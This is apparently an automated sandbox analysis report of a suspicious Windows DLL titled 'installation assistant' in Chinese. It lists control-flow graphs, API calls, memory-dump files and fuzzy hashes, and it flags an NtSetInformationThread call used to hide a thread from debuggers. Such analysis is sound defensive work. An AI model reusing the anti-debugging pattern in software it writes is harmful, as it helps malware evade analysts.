                                            control_flow_graph 7821 6c603886-6c60388e 7822 6c603970-6c60397d 7821->7822 7823 6c603894-6c603896 7821->7823 7825 6c6039f1-6c6039f8 7822->7825 7826 6c60397f-6c603989 7822->7826 7823->7822 7824 6c60389c-6c6038b9 7823->7824 7829 6c6038c0-6c6038c1 7824->7829 7827 6c603ab5-6c603aba 7825->7827 7828 6c6039fe-6c603a03 7825->7828 7826->7824 7830 6c60398f-6c603994 7826->7830 7827->7824 7836 6c603ac0-6c603ac7 7827->7836 7833 6c6038d2-6c6038d4 7828->7833 7834 6c603a09-6c603a2f 7828->7834 7835 6c60395e 7829->7835 7831 6c603b16-6c603b18 7830->7831 7832 6c60399a-6c60399f 7830->7832 7831->7829 7837 6c6039a5-6c6039bf 7832->7837 7838 6c60383b-6c603855 call 6c751470 call 6c751480 7832->7838 7841 6c603957-6c60395c 7833->7841 7839 6c603a35-6c603a3a 7834->7839 7840 6c6038f8-6c603955 7834->7840 7842 6c603960-6c603964 7835->7842 7836->7829 7843 6c603acd-6c603ad6 7836->7843 7844 6c603a5a-6c603a5d 7837->7844 7848 6c603860-6c603885 7838->7848 7845 6c603a40-6c603a57 7839->7845 7846 6c603b1d-6c603b22 7839->7846 7840->7841 7841->7835 7842->7848 7849 6c60396a 7842->7849 7843->7831 7850 6c603ad8-6c603aeb 7843->7850 7854 6c603aa9-6c603ab0 7844->7854 7845->7844 7852 6c603b24-6c603b44 7846->7852 7853 6c603b49-6c603b50 7846->7853 7848->7821 7856 6c603ba1-6c603bb6 7849->7856 7850->7840 7857 6c603af1-6c603af8 7850->7857 7852->7854 7853->7829 7860 6c603b56-6c603b5d 7853->7860 7854->7842 7861 6c603bc0-6c603bda call 6c751470 call 6c751480 7856->7861 7863 6c603b62-6c603b85 7857->7863 7864 6c603afa-6c603aff 7857->7864 7860->7842 7872 6c603be0-6c603bfe 7861->7872 7863->7840 7866 6c603b8b 7863->7866 7864->7841 7866->7856 7875 6c603c04-6c603c11 7872->7875 7876 6c603e7b 7872->7876 7877 6c603ce0-6c603cea 7875->7877 7878 6c603c17-6c603c20 7875->7878 7879 6c603e81-6c603ee0 call 6c603750 GetCurrentThread NtSetInformationThread 7876->7879 7883 6c603d3a-6c603d3c 7877->7883 7884 6c603cec-6c603d0c 7877->7884 7880 6c603dc5 7878->7880 7881 6c603c26-6c603c2d 7878->7881 7895 6c603eea-6c603f04 call 6c751470 call 6c751480 7879->7895 7889 6c603dc6 7880->7889 7885 6c603dc3 7881->7885 7886 6c603c33-6c603c3a 7881->7886 7890 6c603d70-6c603d8d 7883->7890 7891 6c603d3e-6c603d45 7883->7891 7888 6c603d90-6c603d95 7884->7888 7885->7880 7893 6c603c40-6c603c5b 7886->7893 7894 6c603e26-6c603e2b 7886->7894 7897 6c603d97-6c603db8 7888->7897 7898 6c603dba-6c603dc1 7888->7898 7892 6c603dc8-6c603dcc 7889->7892 7890->7888 7896 6c603d50-6c603d57 7891->7896 7892->7872 7900 6c603dd2 7892->7900 7901 6c603e1b-6c603e24 7893->7901 7902 6c603e31 7894->7902 7903 6c603c7b-6c603cd0 7894->7903 7915 6c603f75-6c603fa1 7895->7915 7896->7889 7897->7880 7898->7885 7899 6c603dd7-6c603ddc 7898->7899 7905 6c603e36-6c603e3d 7899->7905 7906 6c603dde-6c603e17 7899->7906 7907 6c603e76-6c603e79 7900->7907 7901->7892 7901->7907 7902->7861 7903->7896 7910 6c603e5c-6c603e5f 7905->7910 7911 6c603e3f-6c603e5a 7905->7911 7906->7901 7907->7879 7910->7903 7913 6c603e65-6c603e69 7910->7913 7911->7901 7913->7892 7913->7907 7919 6c604020-6c604026 7915->7919 7920 6c603fa3-6c603fa8 7915->7920 7921 6c603f06-6c603f35 7919->7921 7922 6c60402c-6c60403c 7919->7922 7923 6c60407c-6c604081 7920->7923 7924 6c603fae-6c603fcf 7920->7924 7929 6c603f38-6c603f61 7921->7929 7925 6c6040b3-6c6040b8 7922->7925 7926 6c60403e-6c604058 7922->7926 7927 6c6040aa-6c6040ae 7923->7927 7928 6c604083-6c60408a 7923->7928 7924->7927 7925->7924 7933 6c6040be-6c6040c9 7925->7933 7930 6c60405a-6c604063 7926->7930 7931 6c603f6b-6c603f6f 7927->7931 7928->7929 7932 6c604090 7928->7932 7934 6c603f64-6c603f67 7929->7934 7935 6c6040f5-6c60413f 7930->7935 7936 6c604069-6c60406c 7930->7936 7931->7915 7932->7895 7937 6c6040a7 7932->7937 7933->7927 7938 6c6040cb-6c6040d4 7933->7938 7939 6c603f69 7934->7939 7935->7939 7940 6c604072-6c604077 7936->7940 7941 6c604144-6c60414b 7936->7941 7937->7927 7938->7937 7942 6c6040d6-6c6040f0 7938->7942 7939->7931 7940->7934 7941->7931 7942->7930
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 13608bcf477aea8c36055a58bcb3bc999dafa6c928e94e0494b923821b975bae
                                            • Instruction ID: 6d56475149d0ae0f8718cb4ce783870db33c490aaccc2570ec1934dd9835cafb
                                            • Opcode Fuzzy Hash: 13608bcf477aea8c36055a58bcb3bc999dafa6c928e94e0494b923821b975bae
                                            • Instruction Fuzzy Hash: BB322732345B018FC328CF28C9D0A95B7E3EFD13157698A6DC0EA6BA95D774B44ACB44

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7969 6c603a6a-6c603a85 7970 6c603a87-6c603aa7 7969->7970 7971 6c603aa9-6c603ab0 7970->7971 7972 6c603960-6c603964 7971->7972 7973 6c603860-6c60388e 7972->7973 7974 6c60396a 7972->7974 7983 6c603970-6c60397d 7973->7983 7984 6c603894-6c603896 7973->7984 7976 6c603ba1-6c603bb6 7974->7976 7978 6c603bc0-6c603bda call 6c751470 call 6c751480 7976->7978 7993 6c603be0-6c603bfe 7978->7993 7988 6c6039f1-6c6039f8 7983->7988 7989 6c60397f-6c603989 7983->7989 7984->7983 7986 6c60389c-6c6038b9 7984->7986 7992 6c6038c0-6c6038c1 7986->7992 7990 6c603ab5-6c603aba 7988->7990 7991 6c6039fe-6c603a03 7988->7991 7989->7986 7994 6c60398f-6c603994 7989->7994 7990->7986 8000 6c603ac0-6c603ac7 7990->8000 7997 6c6038d2-6c6038d4 7991->7997 7998 6c603a09-6c603a2f 7991->7998 7999 6c60395e 7992->7999 8009 6c603c04-6c603c11 7993->8009 8010 6c603e7b 7993->8010 7995 6c603b16-6c603b18 7994->7995 7996 6c60399a-6c60399f 7994->7996 7995->7992 8003 6c6039a5-6c6039bf 7996->8003 8004 6c60383b-6c603855 call 6c751470 call 6c751480 7996->8004 8007 6c603957-6c60395c 7997->8007 8005 6c603a35-6c603a3a 7998->8005 8006 6c6038f8-6c603955 7998->8006 7999->7972 8000->7992 8008 6c603acd-6c603ad6 8000->8008 8011 6c603a5a-6c603a5d 8003->8011 8004->7973 8012 6c603a40-6c603a57 8005->8012 8013 6c603b1d-6c603b22 8005->8013 8006->8007 8007->7999 8008->7995 8015 6c603ad8-6c603aeb 8008->8015 8016 6c603ce0-6c603cea 8009->8016 8017 6c603c17-6c603c20 8009->8017 8020 6c603e81-6c603ee0 call 6c603750 GetCurrentThread NtSetInformationThread 8010->8020 8011->7971 8012->8011 8018 6c603b24-6c603b44 8013->8018 8019 6c603b49-6c603b50 8013->8019 8015->8006 8022 6c603af1-6c603af8 8015->8022 8027 6c603d3a-6c603d3c 8016->8027 8028 6c603cec-6c603d0c 8016->8028 8023 6c603dc5 8017->8023 8024 6c603c26-6c603c2d 8017->8024 8018->7970 8019->7992 8025 6c603b56-6c603b5d 8019->8025 8044 6c603eea-6c603f04 call 6c751470 call 6c751480 8020->8044 8030 6c603b62-6c603b85 8022->8030 8031 6c603afa-6c603aff 8022->8031 8037 6c603dc6 8023->8037 8032 6c603dc3 8024->8032 8033 6c603c33-6c603c3a 8024->8033 8025->7972 8038 6c603d70-6c603d8d 8027->8038 8039 6c603d3e-6c603d45 8027->8039 8036 6c603d90-6c603d95 8028->8036 8030->8006 8035 6c603b8b 8030->8035 8031->8007 8032->8023 8042 6c603c40-6c603c5b 8033->8042 8043 6c603e26-6c603e2b 8033->8043 8035->7976 8046 6c603d97-6c603db8 8036->8046 8047 6c603dba-6c603dc1 8036->8047 8041 6c603dc8-6c603dcc 8037->8041 8038->8036 8045 6c603d50-6c603d57 8039->8045 8041->7993 8049 6c603dd2 8041->8049 8050 6c603e1b-6c603e24 8042->8050 8051 6c603e31 8043->8051 8052 6c603c7b-6c603cd0 8043->8052 8064 6c603f75-6c603fa1 8044->8064 8045->8037 8046->8023 8047->8032 8048 6c603dd7-6c603ddc 8047->8048 8054 6c603e36-6c603e3d 8048->8054 8055 6c603dde-6c603e17 8048->8055 8056 6c603e76-6c603e79 8049->8056 8050->8041 8050->8056 8051->7978 8052->8045 8059 6c603e5c-6c603e5f 8054->8059 8060 6c603e3f-6c603e5a 8054->8060 8055->8050 8056->8020 8059->8052 8062 6c603e65-6c603e69 8059->8062 8060->8050 8062->8041 8062->8056 8068 6c604020-6c604026 8064->8068 8069 6c603fa3-6c603fa8 8064->8069 8070 6c603f06-6c603f35 8068->8070 8071 6c60402c-6c60403c 8068->8071 8072 6c60407c-6c604081 8069->8072 8073 6c603fae-6c603fcf 8069->8073 8078 6c603f38-6c603f61 8070->8078 8074 6c6040b3-6c6040b8 8071->8074 8075 6c60403e-6c604058 8071->8075 8076 6c6040aa-6c6040ae 8072->8076 8077 6c604083-6c60408a 8072->8077 8073->8076 8074->8073 8082 6c6040be-6c6040c9 8074->8082 8079 6c60405a-6c604063 8075->8079 8080 6c603f6b-6c603f6f 8076->8080 8077->8078 8081 6c604090 8077->8081 8083 6c603f64-6c603f67 8078->8083 8084 6c6040f5-6c60413f 8079->8084 8085 6c604069-6c60406c 8079->8085 8080->8064 8081->8044 8086 6c6040a7 8081->8086 8082->8076 8087 6c6040cb-6c6040d4 8082->8087 8088 6c603f69 8083->8088 8084->8088 8089 6c604072-6c604077 8085->8089 8090 6c604144-6c60414b 8085->8090 8086->8076 8087->8086 8091 6c6040d6-6c6040f0 8087->8091 8088->8080 8089->8083 8090->8080 8091->8079
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d044d818ad80b820733abd2c63e51f512ac6d70703b1245aa5fc8a84b136f0c5
                                            • Instruction ID: caccc8c953dd10fd333327bde42d7322f2443279a14088d1bb86725dda75541e
                                            • Opcode Fuzzy Hash: d044d818ad80b820733abd2c63e51f512ac6d70703b1245aa5fc8a84b136f0c5
                                            • Instruction Fuzzy Hash: EF51F2312047018FC3248F28C580BD5B7E3BF95315F698B6DC0E66BA95DBB4B406CB44
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: a1754538de99a4390266794621f88e1c0d7e171088d1415207cc6dd92c4d65a1
                                            • Instruction ID: 4f8ba17dcb44cade12147348df2269c68934f0a47907f3f5055825c9adda27d8
                                            • Opcode Fuzzy Hash: a1754538de99a4390266794621f88e1c0d7e171088d1415207cc6dd92c4d65a1
                                            • Instruction Fuzzy Hash: C551D331204B018BC328CF28C580BD5B7E3BF96315F658B6DC0E66BA95DBB0B446CB95
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: f6a88645d3c9c7a40c8e8d43073f3dc3f257478d655dc302e619c99ce67df282
                                            • Instruction ID: 39325cb9b415100167be634cf5e125249a080cf71c5a3b4455f56e0517995c49
                                            • Opcode Fuzzy Hash: f6a88645d3c9c7a40c8e8d43073f3dc3f257478d655dc302e619c99ce67df282
                                            • Instruction Fuzzy Hash: E6314631205B01CFC338CF24C994BD6B7A3AF96309F194B2DC0A66BA81DBB47009CB55
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: 62157c9e6d061b35c6c091b8b729a0ae48f88723493d45b2196148b8f9ba11cb
                                            • Instruction ID: eddac1c7c5ca71462568bc946e8b8f273f60477df60d0d6e789a91e7775577c2
                                            • Opcode Fuzzy Hash: 62157c9e6d061b35c6c091b8b729a0ae48f88723493d45b2196148b8f9ba11cb
                                            • Instruction Fuzzy Hash: C9312331204701CFC338CF28C694BE6B7A6AF96309F254E6DC0E66BA81DBB17405CB95
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 6C603E9D
                                            • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C603EAA
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentInformation
                                            • String ID:
                                            • API String ID: 1650627709-0
                                            • Opcode ID: 41a3ebe574b015032a7856597d1bf7d848472e2f6c37490305ab2f7489c94300
                                            • Instruction ID: 958128df2ca25aa915c63f260861986893f2a5b9a7b335e588ce498a26882587
                                            • Opcode Fuzzy Hash: 41a3ebe574b015032a7856597d1bf7d848472e2f6c37490305ab2f7489c94300
                                            • Instruction Fuzzy Hash: 0921F731318701CBD33CCF24C994BEA77B6AF9630AF544A2DC0A667AD1DBB4A405CB55
                                            APIs
                                            • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C785130
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: ManagerOpen
                                            • String ID:
                                            • API String ID: 1889721586-0
                                            • Opcode ID: c8fc9ea9e6706fe2fbb9cf8e318e177ec79a6e901a55fb256ecc490e02129461
                                            • Instruction ID: 9f8223a11502d5afb988ac297a22271118340bec8ba0614bbc11d1f1528092e5
                                            • Opcode Fuzzy Hash: c8fc9ea9e6706fe2fbb9cf8e318e177ec79a6e901a55fb256ecc490e02129461
                                            • Instruction Fuzzy Hash: 673118B4A0A341EFD750CF28D644A0ABBF0EBCA758F50896AF989C6360C371C945DB53
                                            APIs
                                            • FindFirstFileA.KERNEL32(?,?), ref: 6C77AEDC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: 21fd5c4f60f58c338e2d9ea63c78c6de41a55b18c70174bd6b0690260a20338c
                                            • Instruction ID: 8253a202091c21c46261338b0dd71ac8a2efd2ca45e1548288ae3a89f355e708
                                            • Opcode Fuzzy Hash: 21fd5c4f60f58c338e2d9ea63c78c6de41a55b18c70174bd6b0690260a20338c
                                            • Instruction Fuzzy Hash: 48113AB45093549FEB208B28DA4450E7BE4BF86328F149E69F4A8CB691D330CC448B62
                                            APIs
                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C75ABA7
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                                            • API String ID: 2738559852-1563143607
                                            • Opcode ID: d4810adba33e5b89d1e7475db26e18ee03f3daad4adef061b12737f072b6ed3d
                                            • Instruction ID: 9adfeb60cfc0a51471bd66a3491dc7b6fcac40ecfa318c6800da3458fe340259
                                            • Opcode Fuzzy Hash: d4810adba33e5b89d1e7475db26e18ee03f3daad4adef061b12737f072b6ed3d
                                            • Instruction Fuzzy Hash: A8626A70A0D3818FC724CF18C590A6ABBF2AFC9314F548D2EE599CB750DB35E8558B92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6824 6c79cad3-6c79cae3 6825 6c79cafd-6c79caff 6824->6825 6826 6c79cae5-6c79caf8 call 6c78f9df call 6c78f9cc 6824->6826 6827 6c79cb05-6c79cb0b 6825->6827 6828 6c79ce64-6c79ce71 call 6c78f9df call 6c78f9cc 6825->6828 6840 6c79ce7c 6826->6840 6827->6828 6832 6c79cb11-6c79cb37 6827->6832 6846 6c79ce77 call 6c790120 6828->6846 6832->6828 6835 6c79cb3d-6c79cb46 6832->6835 6838 6c79cb48-6c79cb5b call 6c78f9df call 6c78f9cc 6835->6838 6839 6c79cb60-6c79cb62 6835->6839 6838->6846 6843 6c79cb68-6c79cb6b 6839->6843 6844 6c79ce60-6c79ce62 6839->6844 6845 6c79ce7f-6c79ce82 6840->6845 6843->6844 6848 6c79cb71-6c79cb75 6843->6848 6844->6845 6846->6840 6848->6838 6851 6c79cb77-6c79cb8e 6848->6851 6852 6c79cbdf-6c79cbe5 6851->6852 6853 6c79cb90-6c79cb93 6851->6853 6857 6c79cbab-6c79cbc2 call 6c78f9df call 6c78f9cc call 6c790120 6852->6857 6858 6c79cbe7-6c79cbf1 6852->6858 6855 6c79cba3-6c79cba9 6853->6855 6856 6c79cb95-6c79cb9e 6853->6856 6855->6857 6860 6c79cbc7-6c79cbda 6855->6860 6859 6c79cc63-6c79cc73 6856->6859 6890 6c79cd97 6857->6890 6862 6c79cbf8-6c79cc16 call 6c7947f5 call 6c7947bb * 2 6858->6862 6863 6c79cbf3-6c79cbf5 6858->6863 6865 6c79cc79-6c79cc85 6859->6865 6866 6c79cd38-6c79cd41 call 6c7a19e5 6859->6866 6860->6859 6894 6c79cc18-6c79cc2e call 6c78f9cc call 6c78f9df 6862->6894 6895 6c79cc33-6c79cc5c call 6c79ac69 6862->6895 6863->6862 6865->6866 6871 6c79cc8b-6c79cc8d 6865->6871 6879 6c79cd43-6c79cd55 6866->6879 6880 6c79cdb4 6866->6880 6871->6866 6872 6c79cc93-6c79ccb7 6871->6872 6872->6866 6876 6c79ccb9-6c79cccf 6872->6876 6876->6866 6881 6c79ccd1-6c79ccd3 6876->6881 6879->6880 6885 6c79cd57-6c79cd66 GetConsoleMode 6879->6885 6883 6c79cdb8-6c79cdd0 ReadFile 6880->6883 6881->6866 6886 6c79ccd5-6c79ccfb 6881->6886 6888 6c79ce2c-6c79ce37 GetLastError 6883->6888 6889 6c79cdd2-6c79cdd8 6883->6889 6885->6880 6891 6c79cd68-6c79cd6c 6885->6891 6886->6866 6893 6c79ccfd-6c79cd13 6886->6893 6896 6c79ce39-6c79ce4b call 6c78f9cc call 6c78f9df 6888->6896 6897 6c79ce50-6c79ce53 6888->6897 6889->6888 6898 6c79cdda 6889->6898 6892 6c79cd9a-6c79cda4 call 6c7947bb 6890->6892 6891->6883 6899 6c79cd6e-6c79cd88 ReadConsoleW 6891->6899 6892->6845 6893->6866 6901 6c79cd15-6c79cd17 6893->6901 6894->6890 6895->6859 6896->6890 6908 6c79ce59-6c79ce5b 6897->6908 6909 6c79cd90-6c79cd96 call 6c78f9f2 6897->6909 6905 6c79cddd-6c79cdef 6898->6905 6906 6c79cda9-6c79cdb2 6899->6906 6907 6c79cd8a GetLastError 6899->6907 6901->6866 6912 6c79cd19-6c79cd33 6901->6912 6905->6892 6916 6c79cdf1-6c79cdf5 6905->6916 6906->6905 6907->6909 6908->6892 6909->6890 6912->6866 6920 6c79ce0e-6c79ce19 6916->6920 6921 6c79cdf7-6c79ce07 call 6c79cefe 6916->6921 6922 6c79ce1b call 6c79ce83 6920->6922 6923 6c79ce25-6c79ce2a call 6c79d1b6 6920->6923 6930 6c79ce0a-6c79ce0c 6921->6930 6931 6c79ce20-6c79ce23 6922->6931 6923->6931 6930->6892 6931->6930
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 8Q
                                            • API String ID: 0-4022487301
                                            • Opcode ID: c5124c0be6e7f06ffb2c80af09e6c89ec53c6b3637f787e200738f19ee1eda9d
                                            • Instruction ID: ff13307ddeda65c3831f32342b477c545ff4bc936d308c676fa5ea23e36f73ac
                                            • Opcode Fuzzy Hash: c5124c0be6e7f06ffb2c80af09e6c89ec53c6b3637f787e200738f19ee1eda9d
                                            • Instruction Fuzzy Hash: C6C11770E05249AFEF01DFACDA89BADBFB4AF0B319F104169E511A7B91C7709905CB60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
